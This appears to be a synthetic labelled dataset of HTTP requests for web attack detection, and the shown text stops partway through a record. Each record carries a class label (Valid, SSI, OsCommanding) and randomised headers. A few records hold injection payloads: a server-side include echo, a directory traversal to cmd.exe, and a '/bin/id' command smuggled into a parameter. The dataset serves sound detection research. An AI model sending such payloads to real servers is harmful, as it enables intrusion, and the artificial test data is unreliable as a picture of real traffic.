If-Unmodified-Since: Sun, 15 Jul 07 17:43:22 CET
If-Match: "ashXRpB3crz1z5Q"
If-None-Match: *
If-Range: "6WzsNyb1_NjRP2j5a_aD"
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM RnRtb3NpRDFlMG5lbkFwZG9zYWdybDBzYWVzbmF0eWdz
Range: -7342
Referer: http://aqesgaIr.biz/03ge5ziv/l4doi/2qeg/nenh.jsp
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.8 (compatible; MSIE 1.7; Solaris; 2or5yrtrs; eibRui)
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7883x011
Via: ihs/2.8 221.88.131.1:7, 7.9 www.eTaao.png, 2.4 www.eeptfaan.tiff
Transfer-Encoding: compress
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 199.4.112.189
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9589
Start - Id: 39274
class: SSI
GET /prayToc4iyy7iThet/isidiin6saimeel3tt/eHoosc9me9a/aouE/nSlocationFe/tessCh2cetaoeu/qoUgroup by-8x/ateu0/ne6ityoeaasfUtan.tiff?BMt7=httpcDh3&dkh5lnh=ivV&ojjiwubo=75529518&ceBENRfs7wEf=xg%2Ftneconnect%5C%5Ctd&snrUeewBgSlve=815849676&GwabtutiiRe25en=eitwdlA2s%5Cy9&ehesl8dsep=nTi&ynranuEtabzgea=s-lQ4dQ&iEuceot=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&net3rtie=aGyiVJeb&are=wogATlf%5Da%5D&bOdf6telnet=4825984&Ewobjectpassthruoptu=aQ2QP-SEO&nrdnou6m6=ss HTTP/1.0
Host: www.xiatbph.cz
Connection: n7E1sgh
Accept: video/mpeg, video/*;q=0.2
Accept-Charset: macintosh, windows-1250;q=0.5, iso-2022-kr;q=0.3, x-mac-japanese;q=0.1, windows-1250;q=0.4
Accept-Encoding: identity, compress;q=0.7, identity;q=0.8, identity, gzip;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 92.21.223.247
Cookie: ol=8e
Cookie2: $Version="26"
Date: Mon, 13 Feb 06 07:23:36 GMT
ETag: "MZdeow9n9NsU3XiC@nF"
Expect: tGnf1g=pja2z2le;grncwlo=gs7s
From: oshte@8ntoethSro.uk
If-Modified-Since: Sun, 23 Dec 07 14:29:02 GMT
If-Unmodified-Since: Sun, 18 Dec 05 03:53:40 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Jan 05 13:47:53 GMT
Max-Forwards: 0769
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: http://www.ceyyoc7r.uk/A7Mit/sec8sm.mdb
TE: chunked
Trailer: Warning
User-Agent: R55s1G6stpeHlisehc
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/4.4 www.7stn.png:0, pbpm/4.8 www.ccahse.css
Transfer-Encoding: compress
Upgrade: dde/7.5
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 34.130.240.220
X-Serial-Number: 04901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39274
Start - Id: 3253
class: Valid
GET /tPlhHyoHm-71PI/br2zkKS8lw7pFu@wq4qz/vMNHNZk6-fLetcFAE/uZvH.v/hreCw/Q62uC.php4?bieccutehoE7Lh=88506&ntohrothoHhohlr=csed&ioecu68ao8a=5174530&Ou9em=ohufy HTTP/1.1
Host: www.shveh.st:19
Connection: amsa
Accept: text/xml, image/*;q=0.7
Accept-Charset: x-mac-greek;q=0.6
Accept-Encoding: *
Accept-Language: 9sinotSo-oxpge;q=0.4, tAgewh-aehnem;q=0.0, roaot-inlshHop;q=0.2, adrlceTp-c, dtbosNi-rTnrty;q=0.4
Cache-Control: eeTgtw=ee0gee4e
Client-ip: 112.59.59.14
Cookie: nn8llhtrTef=wgetsengeudhm;hehhwn8eeeriW2n=nuuC1evssjse;dhu=e3bedt2exec;T2ofsnc=lps> be6qcshutdowned5;azA=398413
Cookie2: $Version="3"
Date: Sun, 18 Jul 04 08:44:42 UTC
ETag: "X9kcHXqb@HPoA6Gp"
Expect: 100-continue
From: rnvsmwZ@Itn3.cz
If-Modified-Since: Mon, 19 Jan 04 10:07:58 GMT
If-Unmodified-Since: Sat, 17 Jun 06 22:48:45 CET
If-Match: *
If-None-Match: "iEq.flR8iROa-Mt8pu"
If-Range: Fri, 13 Feb 09 13:17:25 CET
Max-Forwards: 5534
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: mdtd4r Mierh=aeru9Ogt
Authorization: Basic b2VnMXg2OmF0ZW5zRnI5
Range: 583-
Referer: /tmEAeac/ewczswo/osjeT6A/ah8gan.asp
TE: gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/8.6 (Windows; U; WinNT 5.7; eu-id; rv:8.2.7) Gecko/86683197
UA-CPU: StrongARM
UA-Disp: 355,465,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 796x812
Via: 5.7 www.ingyej.html
Transfer-Encoding: compress
Upgrade: m2sia/0.4, ltolt/9.3, r9eb/4.7, shc6de/5.3
Warning: 802 www.oaete.png "o4sslh" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3253
Start - Id: 36510
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 55.250.39.13
Connection: atR3ee5
Accept: */*
Accept-Charset: windows-1252;q=0.3, gb2312
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: ctwc='Hs'
Client-ip: 138.104.69.2
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="048"
Date: Fri, 29 Dec 06 19:52:24 GMT
ETag: W/"XSBTdwWVG7jW_uARV"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Thu, 01 Mar 07 05:39:05 GMT
If-Match: *
If-None-Match: "djd9FFm.Bhqv.G@gp"
If-Range: *
Max-Forwards: 3924
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: NTLM NzdyNnRvcmFiYTJhdHNvZGxheG5tbmVzb2ltbmtpaUV4dXhvcmFpcw==
Range: 7303-,26337-
Referer: /aoia/ebyu/ihrimiie/ksnsm.pl
TE: trailers,deflate,deflate;q=0.4
Trailer: From
User-Agent: ysefsbag (eMnRMqZgR; gj4dBF89lS; s9.U-iZ; i5uhC9wbPq; s@D4MbEQl)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/3.6 221.19.136.79, FTP/1.6 www.96anue8u.html
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36510
Start - Id: 2454
class: Valid
GET /azI1by/baejserir/er0NE2m/7on/maptoQ.s3/_tNpunionydropformfiframes/87qsA9pas/nEG.48eorYf/gXMngdG0.v6UtvH4nY/eez7stOnvtnrotrorBv/pdin5_5GclH.GT/ubw.php4?4zODEMwp-B=pene0tdw4dtnwrah&sghousRsky=a6+ HTTP/1.0
Host: 192.75.196.136
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: dhs=ies
Client-ip: 128.98.45.142
Cookie: ousplrat=i;it6t8ensywm=includew;rdnneAoe=tid;we6bmcehvu6s=3nidBe0D~iframeR
Cookie2: $Version="76"
Date: Sun, 18 Oct 09 08:19:03 GMT
ETag: "MQ_lYq9ALvF956atDVNI"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Sun, 27 Nov 05 06:16:42 UTC
If-Unmodified-Since: Sun, 27 Nov 05 11:21:44 CET
If-Match: *
If-None-Match: *
If-Range: "e6BYd0ekkhf6b0lNvMRd"
Max-Forwards: 185
MIME-Version: 8.3
Pragma: sniUso=ri9
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: NTLM VG9qb3NzdDdzdGRsd2xUZ25oeWoxaHI4b2JheWkyU3NudWU2bGw4aQ==
Range: 87817-,2898-
Referer: /bvf4hr/grsthclo/usosc7/otra/ptiRtrtt.php4
TE: chunked
Trailer: Transfer-Encoding
User-Agent: wgFP6WvYD http://www.seaod.st
UA-CPU: x86
UA-Disp: 097,5060,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 750x609
Via: 0.9 www.srhB.gif, HTTP/1.7 20.158.248.249
Transfer-Encoding: pEv7
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 416 www.pteq.html "largswoidrewai" "Wed, 11 Aug 04 24:11:21 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2454
Start - Id: 22818
class: Valid
GET /X452@Q.pl?ymyfe=n-hvartmpzq%2Fg HTTP/1.1
Host: www.tmcA1eatc.uk
Connection: close
Accept: text/*;q=0.6, video/quicktime
Accept-Charset: x-mac-hebrew;q=0.5, euc-kr;q=0.3
Accept-Encoding: compress;q=0.0, deflate;q=0.7
Accept-Language: *
Cache-Control: max-age=55080
Client-ip: 173.3.239.168
Cookie: o8ntsa=886176449;dijg=803;9J02ltlD5uite=49;HAgQ=e27R
Cookie2: $Version="458"
Date: Sat, 04 Jun 05 18:36:53 GMT
ETag: W/"oSLg.vCUJVD7fTrQ"
Expect: 100-continue
From: asgr0Hal@rouR.fr
If-Modified-Since: Tue, 06 Jan 04 15:28:27 UTC
If-Unmodified-Since: Mon, 13 Nov 06 05:37:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Jan 04 11:08:22 CET
Max-Forwards: 00
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: Basic dWZ3aXJ0YWg6bWFodHNlZQ==
Range: -637
Referer: http://www.2rle.org/5tiolll/rt8s7oa/gav2nute/sttr/rismsr1.js
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/6.4 (compatible; MSIE 4.5; Open BSD i386; ojst; jrtprmn2r6; onrhn)
UA-CPU: 68000
UA-Disp: 7936,637,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 7.0 www.ieem1hhe.shtml
Transfer-Encoding: deflate
Upgrade: gt7o/0.8
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 8712140
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22818
Start - Id: 19770
class: Valid
GET /Qpd04W1ns/h2hrLnr/xJHexecEDcWJeIx/dkWWqe7uJZk8ojp/nQuUIUJo5clAXEZrhBS.asmx?id=07Hq4jqJPgam&PJrawinnt=+access_logwl&m9=tbdene%2Fsu+47&oHeht=432 HTTP/1.1
Host: www.dwdA.gov
Connection: 7sidi
Accept: application/zip;q=0.8, video/quicktime
Accept-Charset: cp-950, gb2312;q=0.9, x-mac-roman;q=0.3, gb2312;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: neV-o
Cache-Control: no-transform
Client-ip: 165.121.199.201
Cookie: nwDcq=83482;HSU.i68d=0;0aqtdfxngui=sjhdoga;e5iGmraeEdvgnt=8799
Cookie2: $Version="49"
Date: Fri, 12 May 06 16:25:22 GMT
ETag: "qn@ps1@BA@dwNvcx"
Expect: eeEld
From: anaee@1dsrajaLrt.org
If-Modified-Since: Wed, 11 Jul 07 20:30:04 UTC
If-Unmodified-Since: Tue, 19 Apr 05 20:54:11 UTC
If-Match: *
If-None-Match: "bP69Gil@KKGhFhsp"
If-Range: Fri, 07 Mar 08 20:57:56 GMT
Max-Forwards: 612
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM MGNlYWFvM2M5YWxpaHJkdHVraG9ybnNic2F0eHVlZHVoSWRvaXk=
Authorization: NTLM MmlrVDBVbXNrbmR0M25oc3Jpcm5lb3MwNG9hZUl0ZWRubjYxQW1zcTJhMnltaXQ=
Range: 74298-8299,-8816,29108-
Referer: /Dwdalh/eq8fyg/ewonyt/ASdd/qzeu.gz
TE: chunked;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/5.2 (compatible; oanatPUxd; Open BSD i386; uaua9Vms; he4safdl2; otysi9)
UA-CPU: PowerPC
UA-Disp: 108,777,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 951x1383
Via: 3.0 136.188.20.42, 7.2 9.250.86.179:38538
Transfer-Encoding: compress
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 465640999525707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19770
Start - Id: 21423
class: Valid
GET /_BgG8/aLpkqymDJk9P5/uwtam/U46QYW.aspx?snendzssni=ains8qlIaelnefa HTTP/1.0
Host: www.2g4el.st:667
Connection: keep-alive
Accept: video/mpeg;q=0.8, application/*;q=0.6, image/*;q=0.5
Accept-Charset: x-mac-arabic
Accept-Encoding: *
Accept-Language: rau-5chr, iu-atcp;q=0.4, rsinCmg-8oro;q=0.7
Cache-Control: no-cache
Client-ip: 150.44.219.251
Cookie: iesestbhqswi7i=7;oafiRtik=gZcY3H;atg4in8pe=ysatxloaefc;releiniss=yse;2RXZ=t 
Cookie2: $Version="85"
Date: Sun, 02 Aug 09 24:49:17 UTC
ETag: "nn7NGEr6jzML_H2"
Expect: mrae
From: unnd4yhe@pnsUaeitiH.biz
If-Modified-Since: Sun, 21 Mar 10 10:21:24 CET
If-Unmodified-Since: Thu, 27 Apr 06 18:55:45 GMT
If-Match: "3U1ZjyVrcBkmjaaRMC"
If-None-Match: "ocgmFyCfBBAoGZN"
If-Range: *
Max-Forwards: 1814
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="Ac6eaF266Ca7B70FE5920F1FE64EFBf3"
Authorization: Digest cnonce="6srsm"
Range: 9389-552,913284-,86-
Referer: http://www.wEiwr0ds.com/yvnpxtqn/q7pOt.gif
TE: gzip;q=0.8,gzip,trailers
Trailer: Max-Forwards
User-Agent: wIha (n@bpxJg; oy@P2CQ80)
UA-CPU: Sparc
UA-Disp: 425,9226,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 9.7 27.94.250.107
Transfer-Encoding: deflate
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 537 www.qAwwh9uW.css "huyeai3leuoqha7ci" "Sat, 07 Aug 04 03:47:33 CET"
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21423
Start - Id: 4670
class: Valid
POST /eurA3eitsgilr6neta/ddRyq-048/aek7nuet/includeUX.cfm? HTTP/1.0
Content-Length: 257
Content-Language: ses,ts
Content-Encoding: deflate
Content-Location: http://www.ebsteoe.com/36hrael/0ertv.tar
Content-MD5: bXJlRGhPOG9jYm5sbmhDbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Jan 07 03:58:54 GMT
Last-Modified: Sat, 20 Mar 10 20:40:50 UTC
Host: www.anerApees6.com
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: cinfur0e-hne8p;q=0.1
Cache-Control: max-stale=15
Client-ip: 138.205.233.134
Cookie: fiesraf=2]t;rDlcdayuhnqUya=c74tqAlTTrB;0ety5=+w1;4pe5=18623538
Cookie2: $Version="41"
Date: Wed, 09 Jul 08 02:23:21 UTC
ETag: W/"GNMzKzyE2ZglxXAupYRN"
Expect: 100-continue
From: es6emnTp@6gdtmKmk.uk
If-Modified-Since: Thu, 22 Dec 05 13:10:18 GMT
If-Unmodified-Since: Sun, 17 Jun 07 23:29:38 UTC
If-Match: *
If-None-Match: "y.FJ8PQCpRpqFGG0Ui"
If-Range: "F5g_S1N-ENGStoiOk"
Max-Forwards: 557
MIME-Version: 3.8
Pragma: 5vwWRs=u
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Basic b2ZkcDQ6b2VzZXJNcXI=
Range: 511-,489649-576168,-523
Referer: /ycWlgi/iyj4/TtnoEit/jD39di/Ia1snhae.exe
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.2 (Windows; U; WinNT 8.0; oe-Nc; rv:1.9.7) Gecko/55319245
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 111x089
Via: 2.0 0.41.4.21, 2.8 www.ezeh.jpg
Transfer-Encoding: deflate
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 496 www.niTE.jpeg "d7swtamz" "Thu, 24 Mar 05 12:21:16 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 42430609467360464
----: -------------
~~~~~: ~~~~~~~~~~~~

kNZXlogtsay=bS(s&4hahwdrhnb44dkt=6430&alm6lpsmEbeneo=5807&met2umutos=yknsixp_rcpdb%1admin\j&lwic7nTs=r'&objectXSKgroup byhome3mB=srtesubcpihd&M-tI_zv=11072689&aNrlpaTib4=81901368&0eTosh=tErjtea3Obtgobwr&Rs5Cwekee=hcuhodltSar&otdxsdkoyii=eroxR-toiNEI

End - Id: 4670
Start - Id: 11897
class: Valid
GET /snleno/aqtOQOMABcbWpjY/rN/baJant8nhesntMev/ektleino0qno9rnlo/hBmesapzclonetcyoS.cfm?zrzfeveew=v+l&n2Sfe1sazuddv=qAsuae&thwboohoiebp=shutdowneebndb&arIpHqeone=pt7e&etgooea1=8&div3b6jxe0=tn%27&KitZSV-=213&aqynaobzhosos=tS0_KK&oeeqeGiUobct=47&Z4PlhU01=h&uirt=gtwinntti HTTP/1.1
Host: 204.194.216.227:19
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.2
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 8.113.175.85
Cookie: vxe=06570;aojIDMcvF9=ndafetancolmsdd;-70Ggbody3eVd=071834850;I0uR1le4=54
Cookie2: $Version="556"
Date: Thu, 10 Jan 08 19:39:38 GMT
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: hcrt
From: dxse@adueeHiJoe.it
If-Modified-Since: Mon, 11 Dec 06 13:53:55 CET
If-Unmodified-Since: Fri, 07 Sep 07 06:47:59 CET
If-Match: *
If-None-Match: "5mYjWNhP5E.@6iMc6Sk"
If-Range: Wed, 05 Jan 05 02:39:46 CET
Max-Forwards: 1871
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: sero tcgs=n3rcmn
Authorization: emel oohcn=ey9uap
Range: 477-56
Referer: http://ogwolwn.cz/23yOeio/leem/qosweos/tlTe/sconc.asmx
TE: chunked;q=0.7,gzip
Trailer: If-None-Match
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 0.4; ea-aq; rv:1.3.0) Gecko/19495516
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: 6.0 www.isN9kuh.tiff, 3.9 www.eqdpUpr.png
Transfer-Encoding: zEbs
Upgrade: Ijh/8.0
Warning: 336 www.N0ys.htm:4 "eHsiwTfaeeetyrdoo" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11897
Start - Id: 43550
class: OsCommanding
GET /wdE@xBccGFtmG/JOgvA.HamXXxml/ndMf/6intoejasi/mmDrvaccess_logg/q9JXCpt2_K3/t.G0PTO3By.shtml?atAEn1=7at%3Ea%3F%3D+xa&efCmrogtexsh=epfeuwoiledieesje&yds5019est6kh=%26%2Fbin%2Fid%7C&R01null=918&velDb=7&eaisdEeshsuo=8362&oiegsnewut=3536049 HTTP/1.1
Host: www.ee2utiiii.fr
Connection: aob7s
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ofa0ts-ShmtnnI, pn0-na3heiaP;q=0.2, ihi5-fbee, eo8bihc-mlsre6di, rda-TI5ef;q=0.6
Cache-Control: max-stale
Client-ip: 214.70.1.175
Cookie: mtcaktjtsoRnl=ofrom;V@4PxVQ63=aJ_@OzJWwv3d;dd=55
Cookie2: $Version="425"
Date: Wed, 17 Feb 10 04:17:01 CET
ETag: "60KWnTBuO0WR3pn7X4Yx"
Expect: 100-continue
From: nsaoonaw@rhao6t.cz
If-Modified-Since: Fri, 29 Jul 05 08:43:10 GMT
If-Unmodified-Since: Thu, 29 Mar 07 05:04:12 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Dec 07 06:52:24 CET
Max-Forwards: 51
MIME-Version: 7.0
Pragma: SRbdEojh='dtoobay'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: Basic cHR5YzczVGw6M3IzZWhyOGE=
Range: 510-
Referer: /anor1cbb/pNaansn/la3u/s5art6/hsmFe.png
TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: eorfv/2.8.3.0
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 559x227
Via: 8.5 131.17.146.193, 6.4 www.otiem0Rt.jpeg, HTTP/7.8 www.tec9.htm:6
Transfer-Encoding: deflate
Upgrade: Bo4/0.1, iai/6.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 431097380
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43550
Start - Id: 16310
class: Valid
GET /hner/flepw/3agaeCaby5Ri8dswim69/iXKAHkS_SH8R/cEfesS0wre/rrhm6dpeatlrabdskrfd/iyw5Tzyoifrbiaynsap/nmxORRnc6l3VlGyVQ/cFccBNDkaaVIJ.U/s2Q4@2/w.OqjidUK37HNI/htIEd.tiff?uGh6v.pUP=nssFkEm%5D%3B&rcotnsnhnCol4l=780906&5sahnshPi3T=sinull6do&nk=tohzyamuY9ngufd&ehgs=ttibeEeiotr6e71s&V-DaDj2K=en%27znm%26s&cri4itrL0=-h5&tl=iaasaccept&wfzQH=56628 HTTP/1.0
Host: www.aslezn.gov
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic;q=0.5, x-mac-greek;q=0.2, windows-1257;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 49.102.20.12
Cookie: eLds4teets8up9n=l5 qehpnnCtibi;bg=npitn;Cgroup by-dgBJrcp.=et v;Wnes=suoJ.d@@J
Cookie2: $Version="5"
Date: Wed, 28 Apr 04 16:19:20 CET
ETag: "yxCto0OyfXei6KRuEs"
Expect: ehwrchho=9ato
From: fewlhd@mrbErs.biz
If-Modified-Since: Sat, 03 Oct 09 09:21:43 CET
If-Unmodified-Since: Sat, 02 Feb 08 10:55:27 GMT
If-Match: *
If-None-Match: "phJST@p5He4RFTzvbv@"
If-Range: Fri, 10 Dec 04 09:56:06 GMT
Max-Forwards: 32
MIME-Version: 2.4
Pragma: Ubpseif='E5chosm'
Proxy-Authorization: Basic eXR1aDJyNDpvaXR0
Authorization: 7hdc iraE=osfs
Range: -652120,9-,091-
Referer: http://www.oe3Orveo.gov/edlrhct.php3
TE: deflate,trailers,gzip
Trailer: Pragma
User-Agent: nqeqblxse/4.4.8
UA-CPU: 68000
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 885x6451
Via: HTTP/7.7 www.ykno.shtml, 0.0 235.120.34.203
Transfer-Encoding: identity
Upgrade: znuO/5.9, rnoe23/2.5, sutmh/9.2, Paxtie/5.0, dcrIu3/2.7
Warning: 902 73.181.232.48 "htuwwet8tesasuA" 
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16310
Start - Id: 31331
class: Valid
GET /lm9iiptbttLe0se/tduAo/u6/hNNw37/6txurenOt9anmitbeaiu.swf?tdoct2fetEplhnx=rAF&@Z@ZH=%3DEconnectelye%7EretRsp+ain&LmST5=htaccesoczavNz&shCctk=qjoUbk_tt_&ICmphpDi=tr+h8homerconnecttbn%26&ailad09io=m%3Dt&oersiyh6uL73=e8fung&hiyaeTho7EphSad=s%40ejE0GAI.i&1DQAGZYidHX7accept=Fogn3hN HTTP/1.0
Host: 58.92.144.176
Connection: s0so
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=868
Client-ip: 243.156.176.3
Cookie: lsuc7=update/ r
Cookie2: $Version="030"
Date: Mon, 24 Jan 05 24:41:03 UTC
ETag: W/"zr10LAaotkUmY9eP3V6"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Wed, 06 Feb 08 04:01:38 UTC
If-Unmodified-Since: Thu, 26 Feb 04 07:39:27 UTC
If-Match: "5JSgUL69higuMig"
If-None-Match: *
If-Range: Sun, 17 Dec 06 22:27:05 GMT
Max-Forwards: 56
MIME-Version: 3.8
Pragma: e='7nnite'
Proxy-Authorization: Basic bTZyMXg6bXM3aQ==
Authorization: ntus qrrx=1TiSes
Range: 826881-
Referer: /coyLlaE/eolasqt/tphao.avi
TE: gzip;q=0.1,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: me4etcnee5ddrhRrtsxs
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2871x6744
Via: 9.0 94.147.95.241, 2.6 39.134.2.205, FTP/7.0 www.4heeep.js
Transfer-Encoding: imnrme; a6rhX=ferEdBny
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 937954916
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31331
Start - Id: 4742
class: Valid
POST /eo6deae/3eSretvteeakmoem/eongasa6Esiu/anzRHiZToGY1qXzqGw/iciattrybldd/nXbiNiftess/nh8eoaOEctbpeaadiows/prayu/a9Qq/tDTtSk/gmlne38ngmc/WtmpN4fromBWtV.nsf? HTTP/1.0
Content-Length: 15
Content-Language: ihtifn,urcedssv
Content-Encoding: identity
Content-Location: /oseE/ioto0ose/1hhlam/o3re.php
Content-MD5: bHZpNXJwdHVtY3RFZ2FvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Mar 06 19:32:42 GMT
Last-Modified: Thu, 30 Jul 09 08:33:53 UTC
Host: www.lintHOnst.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: ilt-j, ta-nemd1leI;q=0.7
Cache-Control: only-if-cached
Client-ip: 187.93.251.175
Cookie: Waaenr6onrl=th;pBewgetTatf@N=shwsajs;lc=aGFYKv.MfG;remtqiha=a4Lfanjg8pe9lvei
Cookie2: $Version="84"
Date: Sun, 04 Apr 10 07:09:31 GMT
ETag: "vbYEaKVZD_zcfIUAV"
Expect: e2gZ
From: oetmfrha@shu54hnaa4.uk
If-Modified-Since: Wed, 20 Jun 07 24:41:59 UTC
If-Unmodified-Since: Fri, 04 Aug 06 04:38:30 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Dec 05 23:49:25 CET
Max-Forwards: 36
MIME-Version: 6.2
Pragma: d='c'
Proxy-Authorization: Digest opaque="rll9"
Authorization: Basic czhjZXQ6OGw1cmF0OA==
Range: -9054
Referer: http://Oraa.fr/aiwnbie/einump.exe
TE: gzip,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: rgtHoo (syaxoiT; lGnqtCbj; 8KNrznT_eY)
UA-CPU: MIPS
UA-Disp: 035,213,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4366x138
Via: 6.3 181.247.137.135, 2.5 173.112.54.152, 3.6 228.88.18.165
Transfer-Encoding: identity
